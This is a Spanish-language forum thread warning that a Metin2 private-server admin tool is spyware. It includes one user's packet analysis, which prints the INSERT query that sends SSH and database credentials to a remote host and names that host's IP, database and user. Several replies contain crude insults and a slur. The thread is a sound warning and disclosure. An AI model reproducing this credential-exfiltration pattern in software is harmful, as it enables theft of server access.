DiosesMX Servertool Release Publico 21/09/2011
-
bueno yo les cuento que me paso con esta herramienta me blockeo el root de el dedicao ndespues de usarla al dia sigiente tenia cambiado l puerto del root no se porque carajo pero igual solo sumo dos mas dos el dia anterior use esta herramienta i me paso eso prefiero acer todo a mano desde ahora saludos
-
madre mía...
la IP a la que conecta en el puerto 3306 parece que pertenece a x10hosting, que es una página que proporciona hosting gratuito.
Así que de entrada, a sospechar. Si Blaster necesita hacer uso de un host gratuito teniendo dmx... mala cosa _xD_
Segundo, ¿por qué el programa busca actualizaciones al final? es decir, lo lógico sería que buscase actus al arrancar, no cuando guardas tus datos no?voy a probarlo yo también, y así investigo qué paquetes TCP se envían, será interesante para todos.
-
@Collado said:
almenos aviso, luego tendreis problemas de editados los que lo useis o os borraran cosas, habra venta de yang en vuestro servidor, tal como nos hizo blaster a nosotros :facepalm:
quedais avisados, la eleccion es vuestra xD
aqui os dejo una "previa" de todo lo que paso,
[http://foro.metin2hits.com/showthread.php?1206-�Qu�-Nos-Ha-Pasado][0]">[http://foro.metin2hits.com/showthread.p][1] ... -Ha-Pasado
claramente ahi no digo las veces que nos borro la base de datos, (gracias a que hacia y sigo haciendo copias)
no habia perdida mas que de unas horas, pero bueno, eleccion vuestra...
Te recuerdo lo que hicistes con Dmxmt2?
[0]: <a href=
[1]: http://foro.metin2hits.com/showthread.p -
Tras haber realizado las pruebas, puedo decir sin ninguna duda que el programa es UN ESPÍA. Este programa envía los datos de vuestro servidor a una base de datos alojada en la IP: 69.175.121.66
Datos concretos:
nombre de la base de datos: blasterh_servertool
usuario de la base de datos: blasterh
nombre de la tabla: Datos
Ejemplo de query que se ejecuta al guardar los datos de tu servidor con el programa "granuja.exe":
INSERT INTO blasterh_servertool.Datos (`nombre_server`,`string_conexion`,`usuario_ssh`,`password_ssh`,`direccion_ssh`,`puerto_ssh`,`ruta_archivos`) VALUES ('1234', 'server=1.2.3.4;user id=root;password=root;database=account', 'root', 'root', '1.2.3.4', '22', '/')
Eso es lo que ha ocurrido al crear un servidor de prueba, con datos falsos claro. La IP que puse era falsa (1.2.3.4), los usuarios eran "root" en ambos casos, la password también.
Todo es enviado a esa base de datos, para su almacenamiento y posterior uso, sin haber pedido permiso, con total premeditación.Para la obtención de estos datos escaneé todas las comunicaciones que se realizaron desde mi conexión durante la ejecución del programa "Granuja". Se analizaron los paquetes sospechosos, con procedencia/destino la ip 69.175.121.66.
Por añadir alguna prueba, aquí la captura de pantalla del paquete más importante, que delata completamente la intención de este programa:
Lamentable, que un administrador se dedique a esto...
Recomiendo a todos los afectados que realicen la denuncia correspondiente. Robar datos privados es delito. Sabemos quién es el autor del programa, y tenemos la prueba que es el propio programa. -
Tss :|||:
-
LOL no entiendo nada, yo solo era Beta Tester :mem11:
-
todos los que hayan usado el programa, cambiad claves YA.
por favor, máxima difusión del mensaje por epvp, inforge, etc. Todo el que tenga cuentas allí, que busque el hilo en el que han posteado este virus y denúncienlo. Evitemos que más gente sea robada. -
Que patético LOOOL ajjajaj xDDD
Nigga mia, no me jodas que siendo subjefe Blaster no te lo digo... .-.
pd: voy a ir subiéndolo a epvers
-
@Anghios said:
Que patético LOOOL ajjajaj xDDD
Nigga mia, no me jodas que siendo subjefe Blaster no te lo digo... .-.
pd: voy a ir subiéndolo a epvers
Y tu que sabes cacho gay :icon_eek: yo solo descarge la tool y reporte errores, no sabia nada, es más no me entere de la existencia de este tool hasta que hace una semana me dijeron para testearla :mem4:
-
Y todavía sigues tú en DMX. Eso si que es lamentable :trollface:
[http://www.elitepvpers.com/forum/metin2-pserver-guides-strategies/1449152-metin2-pserver-full-management-diosesmx-servertool-4.html][0]">[http://www.elitepvpers.com/forum/metin2][1] ... ool-4.html
Para mi es marginal en serio...
[0]: <a href=
[1]: http://www.elitepvpers.com/forum/metin2